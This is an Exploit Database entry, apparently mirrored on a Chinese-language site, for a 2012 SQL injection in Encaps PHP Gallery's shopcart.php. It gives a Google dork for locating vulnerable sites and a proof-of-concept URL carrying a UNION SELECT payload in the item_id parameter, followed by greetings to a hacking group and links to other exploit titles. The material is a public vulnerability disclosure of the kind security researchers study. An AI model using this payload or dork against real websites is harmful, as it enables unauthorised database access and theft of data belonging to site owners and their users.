Encaps PHP Gallery – SQL Injection

Exploit Database
11 阅读

作者： Daniel Godoy

日期： 2012-03-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18598/

# Exploit Title: Encaps PHP Gallery SQL Injection
# Date: 14/03/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Encaps PHP Gallery
# http://www.encaps.net/software/encapsgallery/
# Tested on: Linux
# Dork: "shopcart.php?action=add&item_id="

[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion,LinuxFer, Scorp
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group

[PoC]

http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

last Exploits
Encaps PHP Gallery – SQL Injection的更多信息

LabVantage 8.3 – Information Disclosure：
FOOT Gestion – ‘id’ SQL Injection：
QNAP Photo Station 5.7.0 – Cross-Site Scripting：
Alive Parish 2.0.4 – SQL Injection / Arbitrary File Upload：
Joomla! Component Ultimate Property Listing 1.0.2 – SQL Injection：
elFinder Web file manager Version – 2.1.53 Remote Command Execution：
eWallet Online Payment Gateway 2 – Cross-Site Request Forgery：
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 – Command Injection (Authenticated)：